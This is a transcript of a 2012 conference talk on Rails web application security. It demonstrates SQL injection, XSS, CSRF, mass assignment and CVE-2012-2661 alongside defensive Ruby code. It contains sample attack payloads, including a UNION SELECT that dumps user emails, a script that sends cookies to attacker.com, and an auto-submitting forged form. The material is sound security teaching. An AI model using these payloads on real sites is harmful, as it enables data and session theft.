web application security in rails
DESCRIPTION
Talk I gave at the RailsIsrael 2012 conference
TRANSCRIPT
![Page 1: Web Application Security in Rails](https://reader034.vdocuments.site/reader034/viewer/2022042607/5555a5e0d8b42a8e1f8b5437/html5/thumbnails/1.jpg)
WEB APPLICATION SECURITY IN RAILS
Uri Nativ RailsIsrael 2012
![Page 2: Web Application Security in Rails](https://reader034.vdocuments.site/reader034/viewer/2022042607/5555a5e0d8b42a8e1f8b5437/html5/thumbnails/2.jpg)
Uri Nativ @unativ
Head of Engineering
Klarna Tel Aviv
#railsisrael
![Page 3: Web Application Security in Rails](https://reader034.vdocuments.site/reader034/viewer/2022042607/5555a5e0d8b42a8e1f8b5437/html5/thumbnails/3.jpg)
Buy Now, Pay Later
1. Shop online 2. Receive your goods 3. Pay
![Page 4: Web Application Security in Rails](https://reader034.vdocuments.site/reader034/viewer/2022042607/5555a5e0d8b42a8e1f8b5437/html5/thumbnails/4.jpg)
Alice
![Page 5: Web Application Security in Rails](https://reader034.vdocuments.site/reader034/viewer/2022042607/5555a5e0d8b42a8e1f8b5437/html5/thumbnails/5.jpg)
Bob
![Page 6: Web Application Security in Rails](https://reader034.vdocuments.site/reader034/viewer/2022042607/5555a5e0d8b42a8e1f8b5437/html5/thumbnails/6.jpg)
Alice and Bob
![Page 7: Web Application Security in Rails](https://reader034.vdocuments.site/reader034/viewer/2022042607/5555a5e0d8b42a8e1f8b5437/html5/thumbnails/7.jpg)
Alice and Bob
![Page 8: Web Application Security in Rails](https://reader034.vdocuments.site/reader034/viewer/2022042607/5555a5e0d8b42a8e1f8b5437/html5/thumbnails/8.jpg)
Alice and Bob
Like Duh?
![Page 9: Web Application Security in Rails](https://reader034.vdocuments.site/reader034/viewer/2022042607/5555a5e0d8b42a8e1f8b5437/html5/thumbnails/9.jpg)
Alice and Bob
<html> <title> MicroBlogging </title> ...
#$@# %#@&*#$
![Page 10: Web Application Security in Rails](https://reader034.vdocuments.site/reader034/viewer/2022042607/5555a5e0d8b42a8e1f8b5437/html5/thumbnails/10.jpg)
Alice and Bob
Hack it!
![Page 11: Web Application Security in Rails](https://reader034.vdocuments.site/reader034/viewer/2022042607/5555a5e0d8b42a8e1f8b5437/html5/thumbnails/11.jpg)
SQL INJECTION
![Page 12: Web Application Security in Rails](https://reader034.vdocuments.site/reader034/viewer/2022042607/5555a5e0d8b42a8e1f8b5437/html5/thumbnails/12.jpg)
@results = Micropost.where("content LIKE '%#{params[:query]}%'").all
SELECT 'microposts'.*
FROM 'microposts' WHERE (content LIKE '%SEARCHSTRING%')
SQL Injection
![Page 13: Web Application Security in Rails](https://reader034.vdocuments.site/reader034/viewer/2022042607/5555a5e0d8b42a8e1f8b5437/html5/thumbnails/13.jpg)
SELECT 'microposts'.* FROM 'microposts' WHERE (content LIKE '%SEARCHSTRING%')
SQL Injection
XXX') UNION SELECT 1, email, 1, 1, 1 FROM users --
![Page 14: Web Application Security in Rails](https://reader034.vdocuments.site/reader034/viewer/2022042607/5555a5e0d8b42a8e1f8b5437/html5/thumbnails/14.jpg)
SELECT 'microposts'.* FROM 'microposts' WHERE (content LIKE '%XXX') UNION SELECT 1, email, 1, 1, 1 FROM users -- %')
SQL Injection
![Page 15: Web Application Security in Rails](https://reader034.vdocuments.site/reader034/viewer/2022042607/5555a5e0d8b42a8e1f8b5437/html5/thumbnails/15.jpg)
SELECT 'microposts'.* FROM 'microposts' WHERE (content LIKE '%XXX') UNION SELECT 1, email, 1, 1, 1 FROM users -- %')
SQL Injection
![Page 16: Web Application Security in Rails](https://reader034.vdocuments.site/reader034/viewer/2022042607/5555a5e0d8b42a8e1f8b5437/html5/thumbnails/16.jpg)
@results = Micropost.where("content LIKE ?", "%#{params[:query]}%").all
SQL Injection - countermeasures
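As an added illustration that is not the talk's code: a simplified model of what ActiveRecord does with where("... ?", value), placed next to the interpolated form from the earlier slide, so the difference is visible in the generated SQL. quote_literal, bind_placeholders and escape_like are names chosen here; escape_like reproduces what Rails' sanitize_sql_like does and covers a caveat the slide does not mention.

```ruby
# Simplified stand-in for ActiveRecord's bind handling (not Rails code)
def quote_literal(value)
  # SQL string literal: wrap in single quotes, double any embedded quote
  "'" + value.to_s.gsub("'", "''") + "'"
end

def bind_placeholders(template, *values)
  # Each ? becomes a quoted literal; the value can never close the quote
  raise ArgumentError, "placeholder count mismatch" unless template.count("?") == values.size
  i = -1
  template.gsub("?") { quote_literal(values[i += 1]) }
end

# Vulnerable form from the slide: user input is spliced straight into the SQL
def interpolated_search_sql(query)
  "SELECT microposts.* FROM microposts WHERE (content LIKE '%#{query}%')"
end

# Countermeasure from the slide: the whole pattern travels as one bound value
def parameterized_search_sql(query)
  bind_placeholders("SELECT microposts.* FROM microposts WHERE (content LIKE ?)", "%#{query}%")
end

# Caveat: binding stops injection, but % and _ in the input still act as LIKE
# wildcards. Rails offers sanitize_sql_like for this; same escaping here.
def escape_like(value, escape_char = "\\")
  value.gsub(/[\\%_]/) { |m| escape_char + m }
end
```

Feeding the slide's search input to both functions shows the UNION ending up inside one string literal in the bound version, with the single quote doubled.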
![Page 17: Web Application Security in Rails](https://reader034.vdocuments.site/reader034/viewer/2022042607/5555a5e0d8b42a8e1f8b5437/html5/thumbnails/17.jpg)
CROSS SITE SCRIPTING
XSS
![Page 18: Web Application Security in Rails](https://reader034.vdocuments.site/reader034/viewer/2022042607/5555a5e0d8b42a8e1f8b5437/html5/thumbnails/18.jpg)
<span class="content"> <%= raw feed_item.content %>
</span>
XSS
![Page 19: Web Application Security in Rails](https://reader034.vdocuments.site/reader034/viewer/2022042607/5555a5e0d8b42a8e1f8b5437/html5/thumbnails/19.jpg)
<script> document.write('<img src="http://www.attacker.com/x.png?' + document.cookie + '">'); </script>
XSS
![Page 20: Web Application Security in Rails](https://reader034.vdocuments.site/reader034/viewer/2022042607/5555a5e0d8b42a8e1f8b5437/html5/thumbnails/20.jpg)
<span class="content"> <%= sanitize feed_item.content,
:tags => ['a'] %>
</span>
XSS - countermeasures
![Page 21: Web Application Security in Rails](https://reader034.vdocuments.site/reader034/viewer/2022042607/5555a5e0d8b42a8e1f8b5437/html5/thumbnails/21.jpg)
The Attack:
Execute arbitrary code / defacement
JSON is not escaped by default
CSS can be injected as well
Countermeasures:
Never trust data from the users
Use Markdown (e.g. Redcarpet gem)
XSS
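The two view snippets above rendered in plain Ruby, plus the slide's point that JSON is not escaped by default, as an added example that is not from the talk. CGI.escapeHTML stands in for ERB's default escaping (the step that `raw` skips); the Rails sanitize helper is not modelled, and json_for_inline_script reproduces what Rails does when escape_html_entities_in_json is enabled.

```ruby
require 'cgi'
require 'json'

# What <%= %> does by default: every HTML-significant character becomes an
# entity, so stored content renders as text instead of markup
def render_content_escaped(content)
  %(<span class="content">#{CGI.escapeHTML(content)}</span>)
end

# The slide's vulnerable view: `raw` emits the string as markup
def render_content_raw(content)
  %(<span class="content">#{content}</span>)
end

# to_json leaves < > & alone, so a value containing "</script>" closes an
# inline script element early. Their \uXXXX forms are still valid JSON and
# parse back to the same string, so the data is unchanged but cannot end the tag.
def json_for_inline_script(obj)
  obj.to_json.gsub(/[<>&]/) { |c| format('\u%04x', c.ord) }
end

def inline_script_tag(obj)
  %(<script>var feed = #{json_for_inline_script(obj)};</script>)
end

# Check used below: does the output contain a literal script tag anywhere?
def contains_script_tag?(html)
  html.match?(%r{</?script\b}i)
end
```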
![Page 22: Web Application Security in Rails](https://reader034.vdocuments.site/reader034/viewer/2022042607/5555a5e0d8b42a8e1f8b5437/html5/thumbnails/22.jpg)
CROSS SITE REQUEST FORGERY
CSRF
![Page 23: Web Application Security in Rails](https://reader034.vdocuments.site/reader034/viewer/2022042607/5555a5e0d8b42a8e1f8b5437/html5/thumbnails/23.jpg)
www.blog.com
CSRF
1
![Page 24: Web Application Security in Rails](https://reader034.vdocuments.site/reader034/viewer/2022042607/5555a5e0d8b42a8e1f8b5437/html5/thumbnails/24.jpg)
www.blog.com
2
Click here for free iPad
www.freeiPad.com <form name="evilform"
action="www.blog.com/..."> ...
<script> document.evilform.submit()
</script>
CSRF
![Page 25: Web Application Security in Rails](https://reader034.vdocuments.site/reader034/viewer/2022042607/5555a5e0d8b42a8e1f8b5437/html5/thumbnails/25.jpg)
www.blog.com
www.freeiPad.com <form name="evilform"
action="www.blog.com/..."> ...
<script> document.evilform.submit()
</script>
CSRF
3
![Page 26: Web Application Security in Rails](https://reader034.vdocuments.site/reader034/viewer/2022042607/5555a5e0d8b42a8e1f8b5437/html5/thumbnails/26.jpg)
www.blog.com
www.freeiPad.com <form name="evilform"
action="www.blog.com/..."> ...
<script> document.evilform.submit()
</script>
POST /blogpost Content="Kick Me!"
CSRF
4
![Page 27: Web Application Security in Rails](https://reader034.vdocuments.site/reader034/viewer/2022042607/5555a5e0d8b42a8e1f8b5437/html5/thumbnails/27.jpg)
<input name="authenticity_token" type="hidden" value="vyFdEgofzU4oSJJn5wypxq4" />
CSRF – Authenticity Token
![Page 28: Web Application Security in Rails](https://reader034.vdocuments.site/reader034/viewer/2022042607/5555a5e0d8b42a8e1f8b5437/html5/thumbnails/28.jpg)
routes.rb
match '/delete_post/:id', to: 'microposts#destroy'
CSRF
![Page 29: Web Application Security in Rails](https://reader034.vdocuments.site/reader034/viewer/2022042607/5555a5e0d8b42a8e1f8b5437/html5/thumbnails/29.jpg)
class ApplicationController < ActionController::Base
  # commented to easily test forms
  # protect_from_forgery
  ...
end
CSRF
![Page 30: Web Application Security in Rails](https://reader034.vdocuments.site/reader034/viewer/2022042607/5555a5e0d8b42a8e1f8b5437/html5/thumbnails/30.jpg)
The Attack:
Attacker sends requests on the victim's behalf
Doesn't depend on XSS
Attacker doesn't need to be logged in
Countermeasures:
Use Rails CSRF default protection (do not override it)
Use GET for queries
Use POST/DELETE/... when updating data
Add a sign-out link
CSRF
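The token check behind protect_from_forgery, as an added and simplified example (not the talk's code; current Rails also masks the token per request): one token per session, the hidden field from the slide, and a verification that lets GET and HEAD through untouched, which is why the `match '/delete_post/:id'` route above stays reachable from another site even with forgery protection on. verified_request?, new_session and authenticity_field are names chosen here.

```ruby
require 'securerandom'

# Methods Rails treats as safe and never token-checks (simplified model)
SAFE_METHODS = %w[GET HEAD].freeze

def new_session
  { authenticity_token: SecureRandom.base64(32) }
end

# Constant-time comparison so the position of a mismatch does not leak via timing
def secure_compare(a, b)
  return false unless a.bytesize == b.bytesize
  diff = 0
  a.bytes.zip(b.bytes) { |x, y| diff |= x ^ y }
  diff.zero?
end

# The check performed on each request: safe methods pass; every other method
# must carry the session's token, which a form on www.freeiPad.com cannot know
def verified_request?(method, session, params)
  return true if SAFE_METHODS.include?(method.upcase)
  submitted = params["authenticity_token"]
  return false if submitted.nil? || session[:authenticity_token].nil?
  secure_compare(session[:authenticity_token], submitted)
end

# The hidden field from the slide, as rendered into the site's own forms
def authenticity_field(session)
  %(<input name="authenticity_token" type="hidden" value="#{session[:authenticity_token]}" />)
end
```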
![Page 31: Web Application Security in Rails](https://reader034.vdocuments.site/reader034/viewer/2022042607/5555a5e0d8b42a8e1f8b5437/html5/thumbnails/31.jpg)
RAILS SPECIFIC ATTACKS
![Page 32: Web Application Security in Rails](https://reader034.vdocuments.site/reader034/viewer/2022042607/5555a5e0d8b42a8e1f8b5437/html5/thumbnails/32.jpg)
MASS ASSIGNMENT
boo[gotcha!]
![Page 33: Web Application Security in Rails](https://reader034.vdocuments.site/reader034/viewer/2022042607/5555a5e0d8b42a8e1f8b5437/html5/thumbnails/33.jpg)
def create
  @user = User.new(params[:user])
  ...
end
Mass Assignment
![Page 34: Web Application Security in Rails](https://reader034.vdocuments.site/reader034/viewer/2022042607/5555a5e0d8b42a8e1f8b5437/html5/thumbnails/34.jpg)
def create
  @user = User.new(params[:user])
  ...
end
Mass Assignment
{ :name => "gotcha", :admin => true }
![Page 35: Web Application Security in Rails](https://reader034.vdocuments.site/reader034/viewer/2022042607/5555a5e0d8b42a8e1f8b5437/html5/thumbnails/35.jpg)
Blacklist
class User < ActiveRecord::Base
  attr_protected :admin
  ...
end
Mass Assignment - countermeasures
![Page 36: Web Application Security in Rails](https://reader034.vdocuments.site/reader034/viewer/2022042607/5555a5e0d8b42a8e1f8b5437/html5/thumbnails/36.jpg)
Whitelist
class User < ActiveRecord::Base
  attr_accessible :name, :email, :password, :password_confirmation
  ...
end
Mass Assignment - countermeasures
![Page 37: Web Application Security in Rails](https://reader034.vdocuments.site/reader034/viewer/2022042607/5555a5e0d8b42a8e1f8b5437/html5/thumbnails/37.jpg)
Global Config (whitelist)
config.active_record.whitelist_attributes = true
Mass Assignment - countermeasures
![Page 38: Web Application Security in Rails](https://reader034.vdocuments.site/reader034/viewer/2022042607/5555a5e0d8b42a8e1f8b5437/html5/thumbnails/38.jpg)
The Attack: Unprotected by default :(
Countermeasures:
Whitelist
Blacklist
Strong Parameters (whitelist): Rails 4, logic moved to the controller, available as a gem
Mass Assignment
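The whitelist idea behind attr_accessible and strong parameters, as an added Rails-free example (not the talk's code): the controller filters params[:user] before the model ever sees it, so the slide's `:admin => true` is dropped or reported. User is a Struct standing in for the model; permit_user_params and UnpermittedParameters are names chosen here, and the :raise/:log options mirror the kind of choice Rails exposes as action_on_unpermitted_parameters.

```ruby
class UnpermittedParameters < StandardError; end

# The same list the slide passes to attr_accessible, now held by the controller
PERMITTED_USER_ATTRS = %i[name email password password_confirmation].freeze

def permit_user_params(user_params, permitted: PERMITTED_USER_ATTRS, on_unpermitted: :drop)
  # Accept string or symbol keys, as request params may carry either
  normalized = user_params.to_h.transform_keys(&:to_sym)
  unpermitted = normalized.keys - permitted
  if unpermitted.any?
    case on_unpermitted
    when :raise then raise UnpermittedParameters, "unpermitted: #{unpermitted.join(', ')}"
    when :log   then warn "Unpermitted parameters: #{unpermitted.join(', ')}"
    end
  end
  normalized.slice(*permitted)
end

# Stand-in for the User model: it only ever receives the filtered hash,
# so admin can never be set through the create action
User = Struct.new(:name, :email, :password, :password_confirmation, :admin, keyword_init: true)

# Replacement for the slide's User.new(params[:user])
def build_user(user_params, **opts)
  User.new(**permit_user_params(user_params, **opts))
end
```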
![Page 39: Web Application Security in Rails](https://reader034.vdocuments.site/reader034/viewer/2022042607/5555a5e0d8b42a8e1f8b5437/html5/thumbnails/39.jpg)
SQL INJECTION VULNERABILITY IN RUBY ON RAILS (CVE-2012-2661)
![Page 40: Web Application Security in Rails](https://reader034.vdocuments.site/reader034/viewer/2022042607/5555a5e0d8b42a8e1f8b5437/html5/thumbnails/40.jpg)
User.where(:id => params[:user_id], :reset_token => params[:token])
SELECT users.* FROM users WHERE users.id = 6 AND users.reset_token = 'XYZ' LIMIT 1
CVE-2012-2661 SQL Injection
![Page 41: Web Application Security in Rails](https://reader034.vdocuments.site/reader034/viewer/2022042607/5555a5e0d8b42a8e1f8b5437/html5/thumbnails/41.jpg)
/users/6/password/edit?token[]
SELECT users.* FROM users WHERE users.id = 6 AND users.reset_token IS NULL LIMIT 1
CVE-2012-2661 SQL Injection
![Page 42: Web Application Security in Rails](https://reader034.vdocuments.site/reader034/viewer/2022042607/5555a5e0d8b42a8e1f8b5437/html5/thumbnails/42.jpg)
The Attack: SQL Injection - Affected version: Rails < 3.2.4
Countermeasures:
Upgrade to Rails 3.2.4 or higher
CVE-2012-2661 SQL Injection
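An added example, not the talk's code: a simplified model of how a hash condition became SQL in Rails 3.2.x (a scalar, nil and an array map to =, IS NULL and IN), reproducing the two statements above, plus the type guard a controller can add on top of the upgrade the slide recommends. predicate_for, reset_lookup_sql and scalar_param! are names chosen here.

```ruby
def quote_literal(value)
  "'" + value.to_s.gsub("'", "''") + "'"
end

# The operator is picked from the Ruby type of the value, which is exactly
# why a parameter that arrives as nil instead of a string changes the query
def predicate_for(column, value)
  case value
  when nil     then "users.#{column} IS NULL"
  when Array   then "users.#{column} IN (#{value.map { |v| quote_literal(v) }.join(', ')})"
  when Integer then "users.#{column} = #{value}"
  else              "users.#{column} = #{quote_literal(value)}"
  end
end

# Models User.where(:id => ..., :reset_token => ...).first from the slide
def reset_lookup_sql(conditions)
  where = conditions.map { |col, val| predicate_for(col, val) }.join(" AND ")
  "SELECT users.* FROM users WHERE #{where} LIMIT 1"
end

# Defensive check for the controller: only a non-empty String may reach the
# query, so nil (the token[] case) or an array is rejected before the lookup
def scalar_param!(value, name)
  raise ArgumentError, "#{name} must be a non-empty string" unless value.is_a?(String) && !value.empty?
  value
end

def safe_reset_lookup_sql(user_id, token)
  reset_lookup_sql(id: Integer(user_id), reset_token: scalar_param!(token, "token"))
end
```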
![Page 43: Web Application Security in Rails](https://reader034.vdocuments.site/reader034/viewer/2022042607/5555a5e0d8b42a8e1f8b5437/html5/thumbnails/43.jpg)
-------------------------------------------------
| Warning Type               | Total |
-------------------------------------------------
| Cross Site Scripting       | 2     |
| Cross-Site Request Forgery | 1     |
| Denial of Service          | 1     |
| Redirect                   | 1     |
| SQL Injection              | 4     |
-------------------------------------------------
Brakeman
![Page 44: Web Application Security in Rails](https://reader034.vdocuments.site/reader034/viewer/2022042607/5555a5e0d8b42a8e1f8b5437/html5/thumbnails/44.jpg)
CONCLUSIONS
![Page 45: Web Application Security in Rails](https://reader034.vdocuments.site/reader034/viewer/2022042607/5555a5e0d8b42a8e1f8b5437/html5/thumbnails/45.jpg)
Make Love not War
![Page 46: Web Application Security in Rails](https://reader034.vdocuments.site/reader034/viewer/2022042607/5555a5e0d8b42a8e1f8b5437/html5/thumbnails/46.jpg)
Know the threats: OWASP Top 10
Follow Rails conventions
Ruby on Rails Security Guide
http://guides.rubyonrails.org/security.html
The Ruby on Rails security project
http://www.rorsecurity.info
Rails security mailing list:
http://groups.google.com/group/rubyonrails-security
Conclusions
![Page 47: Web Application Security in Rails](https://reader034.vdocuments.site/reader034/viewer/2022042607/5555a5e0d8b42a8e1f8b5437/html5/thumbnails/47.jpg)
Daniel Amselem for pair programming
Irit Shainzinger for the cool graphics
Michael Hartl for his microblogging app tutorial
Thanks to…
![Page 48: Web Application Security in Rails](https://reader034.vdocuments.site/reader034/viewer/2022042607/5555a5e0d8b42a8e1f8b5437/html5/thumbnails/48.jpg)
Pay Online – Safer and Simpler
https://github.com/unativ/sample_app